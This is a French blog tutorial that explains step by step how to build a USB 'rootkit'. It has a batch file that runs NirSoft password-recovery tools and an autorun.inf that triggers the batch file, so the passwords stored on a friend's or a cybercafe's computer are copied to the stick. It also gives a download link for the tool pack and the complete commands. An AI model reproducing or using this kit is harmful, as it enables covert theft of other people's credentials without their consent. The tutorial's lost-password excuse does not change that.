Ce rootkit s’exécute
automatiquement et récupère la plupart des mots de passe stocker sur
l’ordinateur d’un ami ou du cyber. Il est vraiment très utile surtout quand on
a perdu ses mots de passe.
Pour créer notre rootkit on doit suivre les étapes suivantes :
Étape 1
Nous allons dans un premier temps télécharger quelques
logiciels qui nous permettent de déchiffrer les mots de passe des applications
les plus courantes. Toutes ces applications sont issues du site Nirsoft
(http://www.nirsoft.net/).
MessenPass Mail
PassView ChromePass IE Passview
PasswordFox Protected
Storage PassView Network Password Recovery
WirelessKeyView
Voici le Packs complets :
http://www.multiupload.nl/W9C4LACNTW
Puis nous allons placez tous les fichiers .exe sur notre clé
USB.
Étape 2
Ensuite il nous faut créer un fichier launch.bat qui va
ouvrir les programmes de récupération de mot de passe et il va stocker les
résultats dans un fichier texte.
Pour cela : on doit créer un nouveau document texte avec
bloc note ou autres éditeur de texte et écrire le code ci-dessous.
1
start mspass.exe /stext dossier1/mspass.txt
2
start mailpv.exe /stext dossier/mailpv.txt
3
start pspv.exe /stext dossier1/pspv.txt
4
start iepv.exe /stext dossier1/iepv.txt
5
start PasswordFox.exe /stext dossier1/
PasswordFox.txt
6
start ChromePass.exe /stext dossier1/
ChromePass.txt
Attention à bien vérifier que les noms de fichiers correspondent
bien aux noms de launch.bat.
Comme vous avez pu le voir dans les lignes ci-dessus, lorsque
le logiciel sera exécutez, ces logs seront envoyé dans un dossier appelé
dossier1. Il nous faut donc créé un nouveau dossier.
Étape 3
Maintenant nous devons créer le fichier autorun.inf
Lorsque vous insérez votre clef USB généralement une fenêtre
apparaît en nous demandant ce que l’on désire faire ! Dans cette étape nous
allons créer une nouvelle option dans cette fenêtre, qui nous permettra (une
fois cliquez dessus) de récupérez les mots de passes du pc et de les stockés
dans le dossier créé dans l’étape 2.
Pour réalisez ceci on ouvre un nouveau document texte puis
on insère ce code :
1
[autorun]
2
3
open=launch.bat
4
5
ACTION= "Le nom de la nouvelle option"
Puis on enregistre sous : autorun.inf
Notre rootkit est maintenant près, il ne reste plus qu’à le
tester.
Commentaires
Enregistrer un commentaire